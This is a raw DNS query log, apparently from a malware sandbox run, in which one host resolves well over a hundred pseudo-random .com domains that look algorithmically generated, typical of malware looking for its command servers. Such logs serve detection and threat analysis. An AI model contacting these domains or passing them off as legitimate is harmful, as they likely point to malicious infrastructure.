                                                                                                                                                                                                              Aug 23, 2024 18:47:37.284089088 CEST192.168.2.41.1.1.10xb3b4Standard query (0)lyxynyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.319160938 CEST192.168.2.41.1.1.10x7fb0Standard query (0)galynuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.543504000 CEST192.168.2.41.1.1.10x9b02Standard query (0)gadyciz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.679685116 CEST192.168.2.41.1.1.10xf40eStandard query (0)lyxynyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.687506914 CEST192.168.2.41.1.1.10xbff3Standard query (0)qegyval.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.700576067 CEST192.168.2.41.1.1.10x4eeeStandard query (0)vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:38.191203117 CEST192.168.2.41.1.1.10x4358Standard query (0)qexyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:38.396585941 CEST192.168.2.41.1.1.10x669cStandard query (0)ww16.vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:38.435899973 CEST192.168.2.41.1.1.10xfef7Standard query (0)qexyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:38.718096972 CEST192.168.2.41.1.1.10x38d1Standard query (0)ww25.lyxynyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.927797079 CEST192.168.2.41.1.1.10x26cfStandard query (0)vofypuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.928783894 CEST192.168.2.41.1.1.10x28d5Standard query (0)qeqykog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.929482937 CEST192.168.2.41.1.1.10x38dcStandard query (0)puzybep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.930449009 CEST192.168.2.41.1.1.10x252Standard query (0)gadypuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.931091070 CEST192.168.2.41.1.1.10xd6bStandard query (0)lymyjon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.932106018 CEST192.168.2.41.1.1.10x667fStandard query (0)volybec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.932811975 CEST192.168.2.41.1.1.10xbb2eStandard query (0)qedytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.933449030 CEST192.168.2.41.1.1.10xd16eStandard query (0)pumyjig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.933892012 CEST192.168.2.41.1.1.10x2489Standard query (0)galyvas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.934165955 CEST192.168.2.41.1.1.10x7821Standard query (0)lysytyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.934484005 CEST192.168.2.41.1.1.10xb9f4Standard query (0)qekyvav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.934928894 CEST192.168.2.41.1.1.10xe87aStandard query (0)pupytyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.935065985 CEST192.168.2.41.1.1.10x8503Standard query (0)ganyhuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.935616016 CEST192.168.2.41.1.1.10xd7f5Standard query (0)vopyret.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.935616016 CEST192.168.2.41.1.1.10x994bStandard query (0)lykyvod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.936150074 CEST192.168.2.41.1.1.10x2577Standard query (0)pujycov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.936448097 CEST192.168.2.41.1.1.10x2f01Standard query (0)gatyrez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.936556101 CEST192.168.2.41.1.1.10xb6c6Standard query (0)lyvyguj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.936959028 CEST192.168.2.41.1.1.10x41ccStandard query (0)vojycif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.936980963 CEST192.168.2.41.1.1.10xb980Standard query (0)qetyrap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.937561989 CEST192.168.2.41.1.1.10x721fStandard query (0)puvygyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.937653065 CEST192.168.2.41.1.1.10x77e5Standard query (0)gahycib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.938122034 CEST192.168.2.41.1.1.10xffadStandard query (0)lyrywax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.938429117 CEST192.168.2.41.1.1.10x13aeStandard query (0)qegyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.938456059 CEST192.168.2.41.1.1.10x4bfeStandard query (0)vocygyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.938992023 CEST192.168.2.41.1.1.10x626bStandard query (0)purywop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.939346075 CEST192.168.2.41.1.1.10x83f9Standard query (0)gacyfew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.939557076 CEST192.168.2.41.1.1.10xdc6aStandard query (0)lygyxun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.942476034 CEST192.168.2.41.1.1.10x1d1dStandard query (0)vowyqoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.944300890 CEST192.168.2.41.1.1.10x3d9fStandard query (0)vonyjim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.944571018 CEST192.168.2.41.1.1.10xb196Standard query (0)qexyfel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.944725037 CEST192.168.2.41.1.1.10x8eddStandard query (0)pufyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.945008039 CEST192.168.2.41.1.1.10xcb57Standard query (0)gaqyqis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.945166111 CEST192.168.2.41.1.1.10xcb3dStandard query (0)lyxyfar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.945319891 CEST192.168.2.41.1.1.10x16fbStandard query (0)vofyzym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.945471048 CEST192.168.2.41.1.1.10xf049Standard query (0)qeqyqiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.945636988 CEST192.168.2.41.1.1.10xceb7Standard query (0)puzydal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.945774078 CEST192.168.2.41.1.1.10x24ceStandard query (0)gadyzyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.945954084 CEST192.168.2.41.1.1.10xd5a6Standard query (0)lymymud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.946342945 CEST192.168.2.41.1.1.10xa583Standard query (0)volydot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.946511030 CEST192.168.2.41.1.1.10x554aStandard query (0)qedyleq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.946679115 CEST192.168.2.41.1.1.10xc09Standard query (0)pumymuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.946830034 CEST192.168.2.41.1.1.10x34ecStandard query (0)galydoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.946990967 CEST192.168.2.41.1.1.10x3cdaStandard query (0)qebyhuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.947978020 CEST192.168.2.41.1.1.10x3794Standard query (0)lysylej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.948793888 CEST192.168.2.41.1.1.10x1e5bStandard query (0)qekysip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.948828936 CEST192.168.2.41.1.1.10xc5d2Standard query (0)pupylaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.949029922 CEST192.168.2.41.1.1.10xeb76Standard query (0)vonymuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.949052095 CEST192.168.2.41.1.1.10x34dfStandard query (0)ganynyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.949218035 CEST192.168.2.41.1.1.10xf3e6Standard query (0)lykysix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.949254036 CEST192.168.2.41.1.1.10x1d50Standard query (0)vopykak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.949395895 CEST192.168.2.41.1.1.10xd4c6Standard query (0)qebynyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.949456930 CEST192.168.2.41.1.1.10x4759Standard query (0)pujypup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.949573040 CEST192.168.2.41.1.1.10x468dStandard query (0)gatykow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.949636936 CEST192.168.2.41.1.1.10xbcbcStandard query (0)lyvynen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.949748039 CEST192.168.2.41.1.1.10xbdcdStandard query (0)vojypuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.949820995 CEST192.168.2.41.1.1.10x2b08Standard query (0)qetykol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.949911118 CEST192.168.2.41.1.1.10xd691Standard query (0)puvybeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.950181007 CEST192.168.2.41.1.1.10x8677Standard query (0)gahypus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.950669050 CEST192.168.2.41.1.1.10x663Standard query (0)lyryjir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.950850010 CEST192.168.2.41.1.1.10x2410Standard query (0)vocybam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.951057911 CEST192.168.2.41.1.1.10x99daStandard query (0)qegytyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.951260090 CEST192.168.2.41.1.1.10x699Standard query (0)puryjil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.951673985 CEST192.168.2.41.1.1.10xcf74Standard query (0)gacyvah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.155694008 CEST192.168.2.41.1.1.10x999bStandard query (0)lygytyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.156353951 CEST192.168.2.41.1.1.10x342aStandard query (0)vowyjut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.165714025 CEST192.168.2.41.1.1.10x656Standard query (0)qexyvoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.167004108 CEST192.168.2.41.1.1.10x7eeStandard query (0)pufytev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.168422937 CEST192.168.2.41.1.1.10x965eStandard query (0)gaqyhuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.171806097 CEST192.168.2.41.1.1.10x3b1fStandard query (0)lyxyvoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.172662973 CEST192.168.2.41.1.1.10xb850Standard query (0)vofyref.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.173218012 CEST192.168.2.41.1.1.10x98bdStandard query (0)qeqyhup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.173965931 CEST192.168.2.41.1.1.10x6586Standard query (0)puzyciq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.175565958 CEST192.168.2.41.1.1.10x88cStandard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.176181078 CEST192.168.2.41.1.1.10xcc10Standard query (0)lymygyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.176321983 CEST192.168.2.41.1.1.10xbd36Standard query (0)volycik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.177565098 CEST192.168.2.41.1.1.10xb300Standard query (0)qedyrag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.177896976 CEST192.168.2.41.1.1.10x2483Standard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.178199053 CEST192.168.2.41.1.1.10x435Standard query (0)lysywon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.178553104 CEST192.168.2.41.1.1.10x6f7Standard query (0)vonygec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.178777933 CEST192.168.2.41.1.1.10x36eStandard query (0)qekyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.179351091 CEST192.168.2.41.1.1.10xc773Standard query (0)pupywog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.180473089 CEST192.168.2.41.1.1.10xd6deStandard query (0)ganyfes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.180846930 CEST192.168.2.41.1.1.10x8aadStandard query (0)lykyxur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.181025028 CEST192.168.2.41.1.1.10xe955Standard query (0)gatyqih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.181205034 CEST192.168.2.41.1.1.10xff3aStandard query (0)pujyxyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.184475899 CEST192.168.2.41.1.1.10x3adfStandard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.184670925 CEST192.168.2.41.1.1.10xaacbStandard query (0)lyvyfad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.187319994 CEST192.168.2.41.1.1.10xe56bStandard query (0)galycuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.187319994 CEST192.168.2.41.1.1.10x37f5Standard query (0)vopyqim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.187510967 CEST192.168.2.41.1.1.10xd8cbStandard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.187558889 CEST192.168.2.41.1.1.10xae74Standard query (0)qetyquq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.187697887 CEST192.168.2.41.1.1.10x88e3Standard query (0)puvydov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.187782049 CEST192.168.2.41.1.1.10x7608Standard query (0)gahyzez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.188126087 CEST192.168.2.41.1.1.10x146bStandard query (0)lyrymuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.188357115 CEST192.168.2.41.1.1.10x677aStandard query (0)vocydof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.188946009 CEST192.168.2.41.1.1.10x483dStandard query (0)qegylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.189030886 CEST192.168.2.41.1.1.10x8043Standard query (0)purymuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.189486027 CEST192.168.2.41.1.1.10xbf42Standard query (0)gacydib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.190572977 CEST192.168.2.41.1.1.10xd1a1Standard query (0)lygylax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.190743923 CEST192.168.2.41.1.1.10x561fStandard query (0)vowymyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.190790892 CEST192.168.2.41.1.1.10xc10aStandard query (0)qexysig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.190978050 CEST192.168.2.41.1.1.10x4ed6Standard query (0)gaqynyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.191057920 CEST192.168.2.41.1.1.10x57a1Standard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.191211939 CEST192.168.2.41.1.1.10xe6d3Standard query (0)pufylap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.191421986 CEST192.168.2.41.1.1.10x4ac1Standard query (0)vofykoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.191751957 CEST192.168.2.41.1.1.10xa07eStandard query (0)gadykos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.191860914 CEST192.168.2.41.1.1.10x440eStandard query (0)puzypug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.191921949 CEST192.168.2.41.1.1.10x98cdStandard query (0)qeqynel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.192090988 CEST192.168.2.41.1.1.10x4e26Standard query (0)lymyner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.192162037 CEST192.168.2.41.1.1.10xdef9Standard query (0)volypum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.192338943 CEST192.168.2.41.1.1.10xaf16Standard query (0)pumybal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.192702055 CEST192.168.2.41.1.1.10x3343Standard query (0)qedykiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.193083048 CEST192.168.2.41.1.1.10xa9fbStandard query (0)galypyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.193694115 CEST192.168.2.41.1.1.10x22b3Standard query (0)lysyjid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.194118023 CEST192.168.2.41.1.1.10xa831Standard query (0)vonybat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.194315910 CEST192.168.2.41.1.1.10xbc06Standard query (0)qekytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.194863081 CEST192.168.2.41.1.1.10x2d12Standard query (0)pupyjuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.195035934 CEST192.168.2.41.1.1.10x8efbStandard query (0)ganyvoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.195194006 CEST192.168.2.41.1.1.10x930fStandard query (0)lykytej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.195777893 CEST192.168.2.41.1.1.10x508eStandard query (0)vopyjuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.196145058 CEST192.168.2.41.1.1.10x4758Standard query (0)qebyvop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.196386099 CEST192.168.2.41.1.1.10xf6a2Standard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.196429968 CEST192.168.2.41.1.1.10xfd40Standard query (0)pujyteq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.196605921 CEST192.168.2.41.1.1.10xf283Standard query (0)gatyhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.196775913 CEST192.168.2.41.1.1.10x3bc3Standard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.196830034 CEST192.168.2.41.1.1.10xb8b1Standard query (0)qetyhyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.196988106 CEST192.168.2.41.1.1.10x8414Standard query (0)puvycip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.370776892 CEST192.168.2.41.1.1.10x7133Standard query (0)qetyhyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.608100891 CEST192.168.2.41.1.1.10xc819Standard query (0)gatyhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.724631071 CEST192.168.2.41.1.1.10xf9d5Standard query (0)gatyfus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.725372076 CEST192.168.2.41.1.1.10x2193Standard query (0)lyvyxor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.726074934 CEST192.168.2.41.1.1.10x6096Standard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.726615906 CEST192.168.2.41.1.1.10x90deStandard query (0)qetyfuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.727207899 CEST192.168.2.41.1.1.10xa9e3Standard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.727890968 CEST192.168.2.41.1.1.10xb943Standard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.728807926 CEST192.168.2.41.1.1.10x39f5Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.728872061 CEST192.168.2.41.1.1.10x8400Standard query (0)vocyzit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.729696989 CEST192.168.2.41.1.1.10x5d45Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.730046988 CEST192.168.2.41.1.1.10x49eStandard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.735950947 CEST192.168.2.41.1.1.10x2eccStandard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.736366987 CEST192.168.2.41.1.1.10x7016Standard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.736426115 CEST192.168.2.41.1.1.10x412Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.736839056 CEST192.168.2.41.1.1.10x7c08Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.737068892 CEST192.168.2.41.1.1.10x499bStandard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.737737894 CEST192.168.2.41.1.1.10xbcf6Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.737737894 CEST192.168.2.41.1.1.10x28eStandard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.738075972 CEST192.168.2.41.1.1.10x73afStandard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.738218069 CEST192.168.2.41.1.1.10xfe05Standard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.738323927 CEST192.168.2.41.1.1.10xe683Standard query (0)puzylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.738677025 CEST192.168.2.41.1.1.10x41aeStandard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.739077091 CEST192.168.2.41.1.1.10xe224Standard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.739195108 CEST192.168.2.41.1.1.10x1c06Standard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.739671946 CEST192.168.2.41.1.1.10x9a93Standard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.739783049 CEST192.168.2.41.1.1.10xd37cStandard query (0)vonypom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.740129948 CEST192.168.2.41.1.1.10x5c42Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.740533113 CEST192.168.2.41.1.1.10xa227Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.740734100 CEST192.168.2.41.1.1.10xbe70Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.741193056 CEST192.168.2.41.1.1.10x686eStandard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.741571903 CEST192.168.2.41.1.1.10xd4b1Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.741571903 CEST192.168.2.41.1.1.10xa935Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.742387056 CEST192.168.2.41.1.1.10x67d2Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.742387056 CEST192.168.2.41.1.1.10xfa36Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.742476940 CEST192.168.2.41.1.1.10xcbcbStandard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.742952108 CEST192.168.2.41.1.1.10x7cadStandard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.743024111 CEST192.168.2.41.1.1.10x1931Standard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.743551970 CEST192.168.2.41.1.1.10x3ff2Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.743551970 CEST192.168.2.41.1.1.10xa09bStandard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.744327068 CEST192.168.2.41.1.1.10x9302Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.744425058 CEST192.168.2.41.1.1.10x97ccStandard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.745156050 CEST192.168.2.41.1.1.10x4cadStandard query (0)lygygin.comA (IP address)IN (0x0001)false
